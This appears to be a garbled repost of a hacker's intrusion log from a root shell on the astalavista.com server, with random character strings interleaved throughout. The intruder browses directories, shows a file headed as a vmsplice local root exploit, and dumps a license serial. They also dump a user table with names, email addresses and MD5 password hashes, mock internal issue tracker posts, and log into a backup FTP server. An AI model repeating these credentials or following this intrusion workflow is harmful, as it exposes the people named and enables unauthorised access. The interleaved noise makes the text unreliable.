( l- ^( f. ?* {" t0 {6 Xdrwx—— 2 com com 4096 Jun 4 04:04 backups& r/ P. R) j2 H8 b; B# X6 w. A7 O) M
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql8 O/ k# W3 [. b# @5 Z& A( a
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system; o5 P" ^' Z2 M7 g: S( V" G' c
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
2 l$ M" Y. o0 [, n4 V+ _$ Z-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout4 Q& X+ ~+ Y* f. A3 r, t' h
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
( `% ?8 ?9 D! ~-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
5 L" d/ h$ B! f2 adrwx–x–x 3 com com 4096 Jan 29 2008 domains4 j' B/ n t* g
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
4 i. \8 f' g& v+ I! f2 v5 s jdrwxrwx— 3 com mail 4096 Jan 6 19:24 imap$ A, n8 M) A4 o/ O/ o' t
-rw——- 1 com com 69 Nov 18 2008 .lesshst
3 O8 M7 I+ {: F/ o- ]- `; ddrwx—— 2 com com 4096 Sep 24 2007 mail: p% q& h* C' z* [5 [+ Y
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
5 `, N* j) q7 o W- ydrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
/ L* _. c( m4 e4 N+ Dlrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html. h- \! @* B6 _3 g S3 k
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
2 K8 w' _. N/ z6 sdrwx—— 2 com com 4096 Aug 26 2008 .ssh
6 t" Q8 @. D g% n5 I' p" u; l-rwx—— 1 com com 8515 Feb 10 2008 t7 P: k0 i) q. {4 n
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
6 G+ s8 N% y7 u+ rdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
, g1 V! m7 y/ l+ ^-rw-rw-r– 1 com com 617 May 20 2008 .toprc
5 Y$ `% ] t ?" R3 `. ^-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql, _8 g$ ^) D9 Z) \6 J
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo9 C3 J h, D4 Z8 x/ h
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
7 r8 c; h2 h& V6 C. ~& m6 W5 m+ I4 t' ^7 l
sh-3.2# head t.c
( j7 I* P( W% G/ {& F/*' z* M) s1 V7 X
* jessica_biel_naked_in_my_bed.c+ |6 w: d% J3 I2 i
*- i" d: w, K2 L4 u, h
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
1 R7 V5 G6 `* k. h9 j3 l) e* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.. b. w* d2 F( F
* Stejnak je to stare jak cyp a aj jakesyk rozbite.3 m* g! P6 N9 t6 J2 U- G
*; k1 Z! o, S4 J5 I$ o
* Linux vmsplice Local Root Exploit
/ I6 \4 o' f \, K! J8 r* By qaaz
+ F: z" P: H& X*
$ k' s3 Y7 m3 y4 R- i/ q K+ Y( z* @
sh-3.2# cd /* y o1 a6 z' V( W1 h
sh-3.2# ls -la0 p* S+ b) a; a3 V
total 3607 B1 g% | u' c" c' G& b9 r: E: l7 q
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
4 y% k( m H$ @. {5 K+ ]2 adrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
7 U; C& I }, R3 L5 C' V- s-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
" P- Z4 Z: u: ?6 q-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
9 x/ Y' ?; Y* @-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
' O3 l; ]2 r! ^. ^-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
& s* @. v8 Z( N) ~6 T5 k' a-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
) q' G" J5 p. edrwxr-xr-x 3 root root 4096 Dec 29 2007 backup
3 [ }& \* o5 S( c8 F- I( A/ X% Edrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
$ u& d# X; _1 J) ~% Wdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot/ I0 V% p$ r8 S5 i' D% ^8 q* f
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev2 K/ j$ n2 K: \9 ~9 B& o# _
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc4 F- L, K4 S( Q2 H! I$ x$ M
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
+ b7 X, u4 e' ?( G-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
2 S/ | w1 E6 I; B& Hdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib+ t8 V$ d* v" J/ O" Y3 I
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64& ~1 _! X3 R' V6 i" N
drwx—— 2 root root 16384 Sep 11 2007 lost+found5 f& b6 U ^' p: |! D, m# _1 `8 `
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media0 r3 g9 \+ l- E1 H; d! I$ y
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
6 t- K* ]4 g9 b3 k6 k" [drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt8 v5 T1 D" O4 F' {+ E0 d
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg6 d' {4 ~: b$ f- t
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
: K Z8 r; z# p( H7 {. P, l7 {drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
5 \! u# T5 M" o( T6 Zdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
8 P) _# a: C: S# Hdrwxr-x— 15 root root 4096 Jun 4 08:40 root
% [ z6 T, k+ c7 Rdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
/ J# x G5 J3 c' Q" r2 |drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
/ {8 r( o4 k5 O1 m* ?* xdrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
$ b3 M+ N. o. K0 Vdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys: w) r X! O9 V0 T# I& a2 U M
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp. i. e2 J% v$ S/ e) X; `) K* U
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
; D0 O4 u" G( I F& ~% I6 ^drwxr-xr-x 26 root root 4096 Jun 4 03:16 var
# Q) V. _4 W& Y( t. [# G/ v1 v6 o) H/ R
sh-3.2# cd opt
( a+ l# G' l6 ?, wsh-3.2# ls -la
$ Q! y" n! ]7 S7 c9 N% g& j* s( Ytotal 20
) p$ v6 Q# g* _: g: ndrwxr-xr-x 3 root root 4096 Mar 11 17:56 .
/ q9 w6 n1 o0 B+ W- l! N6 D0 x! @drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
2 w2 x% X W" h+ |. V# f- _; mdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws1 z+ n9 v" X# }) p& _+ f. l! E, s* I; {& t/ ~
1 T& y5 Z( \6 `
sh-3.2# cd lsws/
/ q2 _2 P7 d4 \- Qsh-3.2# ls -la$ \/ o( G% M3 m8 c1 e) ?" \1 }! R
total 108) V0 z4 J9 F5 W* M/ Z/ `
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
' k+ L D- Q# B6 \drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..( l% M- {; c9 P8 Y1 i6 b+ w
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
. X3 Y( y7 k% h, f6 X( |4 c9 ]' Ndrwxr-xr-x 13 root root 4096 May 29 15:10 admin2 U- u5 k; {9 w( a4 x% G; z/ c4 r$ \( d
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate# V/ F+ W8 D) `1 I# O% Q
drwxr-xr-x 2 root root 4096 May 29 15:10 bin& f( e6 m- \+ c
drwx—— 4 apache apache 4096 Jun 3 02:43 conf M/ T) |; Y% {) y6 |8 d7 N: R
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT! M( P- `4 l1 x" u0 r+ i# n, p
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
' H* {5 |1 V2 Q! Adrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
4 a- b! L: g2 N o7 @4 Z1 wdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib4 \* e5 @( x6 a7 C7 D+ t3 ^/ t+ f- o4 I
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE; q" \* f2 i5 |0 c! j
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP/ K/ A8 [" q4 l/ ]
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL* K1 }% |& y a( t( G2 W
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
5 u' K/ s. q+ m+ t! Adrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs5 v1 L8 K1 W. G9 q
drwxr-xr-x 2 root root 4096 Mar 20 2008 php1 r' m: {( {# _4 A
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
) m9 }3 m" s9 T+ l5 Pdrwxr-xr-x 3 root root 4096 Mar 20 2008 share2 L5 Q5 f3 n! h D
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
2 v# t# _- ~1 e+ G
. [- G+ X+ @; _- X( esh-3.2# cd conf
) J( h0 G" b. ~- c+ E9 X& B# Z& Osh-3.2# ls -la$ z. r$ m8 n- C% K
total 48+ r7 D( T5 O; ]1 d9 p
drwx—— 4 apache apache 4096 Jun 3 02:43 .& \( l: B2 h. \' y0 g5 K. {- z7 \5 e2 q
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
: h9 r; s. N$ |; ^drwx—— 2 apache apache 4096 Mar 20 2008 cert( e" v0 x& M. x# Q; w" ~
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml5 }/ {, f% l o7 y4 k! m" s, y
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak4 x- N4 @: {. a( I" Z
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
8 m, a8 l, D9 l3 N1 f* E' \: r# w( Z-rw——- 1 apache apache 256 May 29 15:10 license.key% N$ h) }$ U! Z. T3 N" \
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old4 ~* j' u) K5 s. N2 Y: f5 h9 u* ~- \
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties5 }' N0 o1 X8 z5 N
-rw——- 1 apache apache 20 May 29 15:10 serial.no4 }2 L9 m+ e: R: s: v
drwx—— 2 apache apache 4096 Mar 20 2008 templates6 O1 }$ m5 r3 R0 W4 N& ~
3 I/ o( L4 R# H5 l* {% psh-3.2# cat serial.no
9 H% t+ J2 @0 @7 P* Y6 _9 iIbDl-oVsO-CKqL-wVRa
5 X V4 x3 }* a, Z" D# _" n0 R' X: n; C4 y' g
sh-3.2# mysql! b% h+ v: z, ]0 G7 B
Welcome to the MySQL monitor. Commands end with ; or \g.; @/ |5 l. b8 O9 F$ z5 n: |
Your MySQL connection id is 2868447 a2 D, [9 V% M4 O# r/ N
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
3 w) e* j, l4 z7 {, L0 b4 R8 V, _1 T8 }0 r% |, k9 m
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
, P' h5 R# p4 l4 G+ G4 l5 g3 K
' ~9 q2 S+ A9 V' _mysql> show databases;
9 z1 R- l# B1 S, n6 S+———————–+
8 e5 \2 ^/ M- A' R+ T| Database |
! o0 L l3 O7 l: N4 t% ]+———————–+: _' s7 ~' s+ `8 H( S+ e
| information_schema |; P7 g4 N8 |' }: Y
| astanet_ads |: r; r. n) r/ S5 Q2 n: ~7 H
| astanet_mailing_lists |1 f2 c' w0 Z0 x1 W/ y' ~
| astanet_mediawiki |
$ R5 k: `* K7 A1 ] @* P| astanet_membersystem |0 X4 ?% y; e# n4 T
| com_contrexx |. s2 S+ J* B/ L, j8 y6 q
| com_contrexx2 | ~* e7 N3 r3 H8 m$ E4 `
| com_contrexx2_live |
+ B' M4 [6 U, n% u$ z+ c| da_roundcube |7 r2 {$ P: J/ {
| dolphin |
" l& `/ f# ^& [" l8 @* s" |' {7 I. L| ideapool |
, I$ i0 c& O' G6 p& P8 P5 D& [; I| mysql |
$ ]& p& ?2 A) ` g1 G/ j| test |. {0 e9 t, ~( F
| yourmaster |1 n- E0 m6 y. ?7 Q
+———————–+1 V% q+ u6 h, A& k+ c
14 rows in set (0.00 sec)
/ x* f( U2 ]; _/ j+ W) q: ^ E% g2 M$ @- m
mysql> use ideapool
; Z7 V+ Z5 Y; M7 z: ^$ KDatabase changed
$ D, `8 y1 b# _5 l; z; @) F+ Mmysql> show tables;: i- i1 D) ?* x; Z# s
+———————————–+
3 x! {* O2 ?3 F+ ~5 v! Z| Tables_in_ideapool |
8 Q% E# O& O5 o& ^# L+———————————–+
9 L! x# F4 j8 J# k& H# o( M| eventum_columns_to_display |
) v& T8 L. R, m" I+ j# r0 t- n| eventum_custom_field |
. V9 E; A& q# p3 e/ _% @| eventum_custom_field_option |
% F- ?9 s8 p1 F+ a: ^4 Q| eventum_custom_filter |
4 `/ }2 i; }9 [| eventum_customer_account_manager |
. S: G: f2 a% ?/ i| eventum_customer_note |# Y G4 A5 b5 H) E
| eventum_email_account |2 j; J, q5 Q7 @# t. J5 s
| eventum_email_draft |
) ?1 C G4 y4 @) F+ E. |6 G0 u- q| eventum_email_draft_recipient |
6 x* O; l6 M$ ~$ ?: T; w1 N; I| eventum_email_response |
/ Z- H4 x1 y2 w8 f| eventum_faq |3 K! X6 s Q# P" w ?' X
| eventum_faq_support_level |- X! _9 u( w7 ~! `1 _% ^* b9 A
| eventum_group |9 g! e/ P/ H; y$ j$ T5 B
| eventum_history_type |
% p! j( i& m& q' C| eventum_irc_notice |
' n3 ^% q' `* E9 [| eventum_issue |
, j8 R* N9 \5 L$ @1 W| eventum_issue_association |
, L3 L! m3 A F: N: H| eventum_issue_attachment |
5 S; V+ R/ |$ p/ K| eventum_issue_attachment_file | S" h. Q& b7 L6 W" Y
| eventum_issue_checkin |
! R/ G- o9 [8 w| eventum_issue_custom_field |" I5 S; J4 v$ b1 x
| eventum_issue_history |
* m9 m0 S7 S# }6 i. H/ F3 x| eventum_issue_quarantine |
" v: I# b, ? @% ?| eventum_issue_requirement |! s6 V' X; F( z% c7 m! H9 @
| eventum_issue_user |
& D" X: c8 s4 b/ _! q| eventum_issue_user_replier |; p: r7 _/ k" ~( z3 u
| eventum_link_filter |4 n3 c% w8 v" B* \! H b
| eventum_mail_queue |
, G% \6 y8 O4 i/ a* c6 @| eventum_mail_queue_log |7 e3 ~1 ]; S& J) A! {
| eventum_news | S7 f' q1 K. c7 I1 Z
| eventum_note |
* n9 \9 `% @; a! G| eventum_phone_support |! }5 z% [0 v' V0 s* z
| eventum_project |% f5 M2 C( m( q3 Q4 L" c
| eventum_project_category |9 y0 ^6 _+ g- P
| eventum_project_custom_field |5 q- Z: ^! i! }0 B
| eventum_project_email_response |
. Y7 g! R: O, S% L; J1 w. M5 }| eventum_project_field_display |
1 b, V; K6 ]+ b9 Q% m: Y| eventum_project_group |2 E* z4 m1 _% u2 b
| eventum_project_link_filter |
4 W! _$ h; N$ ?5 V| eventum_project_news |% t% h- Q* z) |( f8 y
| eventum_project_phone_category |, }: u9 P( | t: C- `* J7 H
| eventum_project_priority |# T$ ~, G$ ?& f
| eventum_project_release |
7 d$ ^( O" n7 n. R| eventum_project_round_robin |
& t$ h8 u4 A; p( {2 k+ I3 |7 w| eventum_project_status |2 G& |$ {1 [' m
| eventum_project_status_date |
& N7 S A: T0 d1 Y9 V| eventum_project_user |
: i/ a( {; v0 w7 m M| eventum_reminder_action |7 g6 [5 F' i2 C. q8 s* f$ J
| eventum_reminder_action_list |
! o X5 |4 \1 Z3 D5 N# M) j8 _7 y| eventum_reminder_action_type |
# U6 ]# p! \, k( w5 H| eventum_reminder_field |0 N6 S+ M8 Z8 n3 g
| eventum_reminder_history |
8 V$ G1 N7 ~0 D5 m3 z: X| eventum_reminder_level |9 I! t, g9 s. p. `
| eventum_reminder_level_condition |
1 u8 x1 T9 X! @. ~$ f! U2 j| eventum_reminder_operator |, J% Y+ P* j$ m; S, ]5 C8 R
| eventum_reminder_priority |$ D+ w. A* g- Q# M W' B
| eventum_reminder_requirement |3 e; t3 h$ T# A
| eventum_reminder_triggered_action |
1 ]1 L6 P; ~% s7 ~6 [! o| eventum_resolution |9 r: P/ N0 M4 X+ l7 B% |3 Y
| eventum_round_robin_user |8 x5 I' H# i' _6 C
| eventum_search_profile |
+ O; Y: A7 C3 A0 b7 T| eventum_status |
) M! f, v+ z4 I- q( Q| eventum_subscription |
' ^+ }: T, X& C2 ^/ ~' x* Y| eventum_subscription_type |) E8 s# U! r1 E( r
| eventum_support_email |
& Z& [! ~, o9 I, l) T @% k| eventum_support_email_body |
% y) ]3 h; G5 O$ Y) V: A| eventum_time_tracking |( L8 _! t( H( ^% u5 P* U7 w+ M+ z
| eventum_time_tracking_category |
: B" L# ]9 l- \+ s4 j; z- L| eventum_user |
p" }" n+ _9 F0 z8 P" J+———————————–+
' M% J$ t" ~( f, L69 rows in set (0.00 sec)
, U' o! N$ u2 s+ a( [) I( t8 [
7 h7 f0 r4 k5 I; K4 dmysql> describe eventum_user;9 S1 F( F) |! |1 t. j( g3 O. k
+————————-+——————+——+—–+———————+—————-+
5 B+ Z! ?8 q; w. S r; {8 W| Field | Type | Null | Key | Default | Extra |
. S# D* J5 s- U: D- J+————————-+——————+——+—–+———————+—————-+. L/ J& m* W8 J- D
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
+ o" U3 R6 s, k. z, h5 X| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |( c4 [+ v: I6 L U
| usr_customer_id | int(11) unsigned | YES | | NULL | |" `5 N5 c; C5 ?1 O: `
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
9 E8 R+ z u) s% a' O/ S1 s4 H0 H4 a| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |/ q! J4 N) ?3 v, Z: _
| usr_status | varchar(8) | NO | | active | |
+ |( H) X1 Z! L$ |9 @ E| usr_password | varchar(32) | NO | | | |
* }, X0 V$ W% r7 V| usr_full_name | varchar(255) | NO | | | |
. Y7 D/ q- Q- k| usr_email | varchar(255) | NO | UNI | | |
7 p0 ~+ c' t: [# c1 y+ S; f| usr_preferences | longtext | YES | | NULL | |& q. V9 c8 r4 {/ v6 a. h( \* n; {
| usr_sms_email | varchar(255) | YES | | NULL | |
4 K0 J' M; @( [8 \| usr_clocked_in | tinyint(1) | YES | | 0 | |
, {* \4 O1 h4 @6 {| usr_lang | varchar(5) | YES | | NULL | |7 o) h! F5 ^$ d; T
+————————-+——————+——+—–+———————+—————-+
2 d" ]( x) c' M: c h& ]$ ]8 q9 [13 rows in set (0.00 sec)
% q7 Q, l9 l5 ]6 X% E2 b( z
! O9 n3 d/ ~! ?* kmysql> select usr_full_name,usr_email,usr_password from eventum_user;; n3 E/ {: l! O# X5 r
+———————-+——————————-+———————————-+
4 a# l; y: l# P; L5 Y1 B; q| usr_full_name | usr_email | usr_password |' {5 h2 l8 g* ]
+———————-+——————————-+———————————-+; `4 Y+ h+ h# w5 v' Z9 {
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |# x& h6 c% A; G1 o" x# @" U! b' S! @
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
: Q/ E, O0 x/ m/ ]% {$ F| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |- `/ X$ t9 ^, n0 x1 w
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |, f D' |+ _3 w/ \
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
+ w8 Z4 {# \8 q: r& n| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |3 o% O& I$ ^3 j0 V# U) u
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
% ~6 t% |% p j3 U: j| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |% A+ i6 |. U8 R& L. a( g
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e | G) {" _0 {0 @* `- A9 R8 z& l
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |* c- {! I6 {: e x( m. o+ n
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
; x0 [' Q. X7 ?! `3 B9 @| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |0 ]1 w7 U; a. Z, s5 l' |- J
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |% u- H m! s3 `- C/ c
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |( X0 M* k c+ J: g( N9 s
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |( x) s) s# w7 |1 ~! z Y
+———————-+——————————-+———————————-+& o6 D0 ?8 C% e. m" T
15 rows in set (0.00 sec); E; L( J. q6 Z( m* r! G
6 t& h# }- I( B k% `; R
mysql> select iss_description from eventum_issue where iss_id = 43;
8 i5 D6 l) c7 h: d& o+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+( z( p6 w$ b b
| iss_description - u6 ?$ N: r$ U4 O a
|2 T, p- N' D4 E
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
! J$ {% a- V, b| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
' o' S. z9 j+ Oconnected for 90 mins… 120mins… so what i propose is something like:
% E8 E, h: p: S5 P# H# h' t# n链接标记[url]http://www.surfthechannel.com/[/url]
8 {( G8 P( i6 m/ t9 rsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system2 F% H5 r: K" e; h+ n* e! z
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
& P o4 E: G# h4 Ybreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
, v( s2 _6 U1 O8 |& C; W; ~+ H Wif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…* A$ r! J/ z5 _
) T: G F. w+ P0 rWe could also put advertisement during play on the flash video player itself… extra $$…6 w; c3 z0 S, e. N; a& N
7 t2 \$ e% i2 G$ p8 t+ p" Q- w
By sykadul |
: a9 u' r% w1 m _+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
+ Z5 k: z2 {" h% o( @7 p; N1 row in set (0.00 sec)
; e- `2 P/ `1 t' L
: r; O! a; I' @5 r; m8 G4 \/ b$ d1 H// Money and extra $$ is all they care about. remember that.; t8 _% Y6 A" X( Q0 B* Z, i% Y
$ q1 `. ~* j# ?mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;$ |2 o Z. A3 C6 j8 l: a5 A# F0 d
+————————+——————————————————————————————————————————————————————————————————————————————-+
$ N' r0 O% f8 {9 Z9 J" t [| iss_summary | iss_description . {4 P# k0 L1 \2 E9 p4 [+ p
|7 M" ~/ o6 d" l9 H4 o
+————————+——————————————————————————————————————————————————————————————————————————————-+
, k2 k; i' V' W o| Forum for REAL EXPERTS | Hello,
0 E8 A0 k' b9 S1 v
* R, t. j3 k7 B8 I. q; KIshtus and I,$ F. ^; d. [2 C" T
! X: W- e) G! I: i* q2 Z: n. U
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide0 a' t2 L5 k) s4 [2 I8 P5 u7 p2 _
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
1 z7 q7 K- y8 @6 S+ w
9 f( V9 x3 N( A6 MOne example a friend of mine from coresecurity.com!# g n/ T' z* }
* g9 X' V4 C. Y }We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
; g. {5 a5 T( }9 N
1 O. h% C8 J T8 a1 H( ?( y|- P ]1 n% i7 W; f
+————————+——————————————————————————————————————————————————————————————————————————————+2 b! Y8 r# \. ]$ p2 e
1 row in set (0.00 sec). H8 s* z1 A" S9 q
" v) @& r4 }: z* T2 ~
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
& i& K; Z3 w: }3 }# W3 j
; k% N6 V; u" V1 V# _mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
* V L8 U( C2 D: J* C2 b( z5 e6 O1 m+——————+———————————————————————————————+
& T: O X7 y! Z: g# i$ |9 ~| iss_summary | iss_description |* s5 _& d- n+ d8 c7 A" e4 Y
+——————+———————————————————————————————+
4 }* v) z) X% y9 _| Website guidance | Virtual Girl which guides you trought the website.
T8 A7 L# C! g
; v5 ~5 d; M' U- A: K: WWe need a girl with who you can ( talk )!!!9 o0 q7 q) w8 ^# y M) K' l3 {/ A
Also for the News!* G6 F$ a; y$ Y7 O( e
So my suggestion is a girl who read you the news loud if you like!! q: ^' g6 M ~- x' R- D
you can choose between read yourselfe or she read it for you or both!
9 z- \+ M* v# M, m8 Y+ x6 l* U9 @. F4 B) ?" S
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!+ R7 l/ f( V* }0 X8 [
9 r$ M- h1 g8 Q# y* rHave a look on the example girls!!
0 |* w# o- b8 l" ?* c6 f1 S+ `
5 N7 r% d7 s# w$ r G8 _链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
! i) S% l8 w! g% i
2 g8 G/ v8 Q& s- Vor that# b" {: I( ^! q B& z
8 m8 J# `/ ^5 {, s; O0 J
链接标记[url]http://www.yellostrom.de/[/url]) e. I F1 c9 x8 |* s0 ~% R! e2 W+ I
/ O* N& v& y9 y5 s& O% g
|
# l9 P2 _& {3 K5 O1 q4 M T+——————+———————————————————————————————+
9 [" U/ u, M- c: @2 ]: w( F1 row in set (0.00 sec)5 a7 x r; x$ T. U/ {+ \; [
7 X2 G0 {6 P5 H2 F9 y! _: \
// ha ha.
2 J% d: A9 {3 L* I2 l- ?0 J+ d" T/ k6 a- V2 ~9 K2 u
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
; H8 D. v: r8 i" ]- p& v+————————–+———————————————————————————————————–+& x/ ^# E; {% Y; p! K+ o4 I' f
| iss_summary | iss_description |0 i& e# K7 f* C* d; u# L& O* G
+————————–+———————————————————————————————————–+4 v; p4 O9 [" P3 w4 o
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |. ? u# h* S2 k/ W
+————————–+———————————————————————————————————–+. K. T& v) k9 p, x; f2 R
1 row in set (0.00 sec)
/ p0 y1 C" V' P+ E2 [0 A1 Z2 X& T" z" Y5 l: G! e
// LOL.( x; c7 s1 D F( N
& Y- Q0 ] e+ D4 rmysql> exit' U! P) A6 [( @; |1 z
Bye4 Z' H9 L1 ^6 Z) a# |" r7 d
# k* R/ n# s; R: z' psh-3.2# ftp 212.254.194.163
* m2 q- e5 H! s' p7 W; V1 \- vConnected to 212.254.194.163.
& d2 d0 J- E: O0 A$ k220 BackupCOM_VW FTP server ready.4 ?2 z& M& j% c: U% q( |, e7 _+ B# y
504 AUTH: security mechanism ‘GSSAPI’ not supported.
4 w0 e4 U* ?1 g$ ]3 x504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
/ z/ L1 V8 _2 nKERBEROS_V4 rejected as an authentication type E; R) q4 d$ E2 X8 O, ~* K
Name (212.254.194.163:root): astalavista.com8 F8 y7 w9 ^7 V) U ?1 J" h8 \
331 Password required for astalavista.com.& ~$ F1 H8 {9 Y
Password:: G6 f; n( Z# ^( |* R& Y
230 User astalavista.com logged in.$ s2 o9 A* ~$ D, U3 D
Remote system type is UNIX.* z3 v7 ]6 P( \* E; l) [3 X- w6 B* X
Using binary mode to transfer files.
- m, {/ v- |" e( I/ Kftp> ls -la5 c5 E7 o9 ~0 F: d
227 Entering Passive Mode (212,254,194,163,2,188). }+ M( A0 O% k
150 Opening BINARY mode data connection for ‘file list’.
5 Z" |1 _! ?) gdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com/ J" b/ Q% `* F9 x% i5 `
226 Transfer complete.$ a% N0 ?' F" Y Z6 i+ P4 |3 v
ftp> cd astalavista.com
4 @) q: N& Q3 O8 |0 I) E2 J# W$ S, x9 x% h250 CWD command successful.5 ?5 N) I# w# u. K: I
ftp> ls -la
+ P7 |, A. l, \4 Q2 l227 Entering Passive Mode (212,254,194,163,2,189)
' }* L- t; v$ n150 Opening BINARY mode data connection for ‘file list’.9 Q) o3 |( w0 ~/ O1 o' u. b
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar- x! ]3 q3 `+ |, a
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
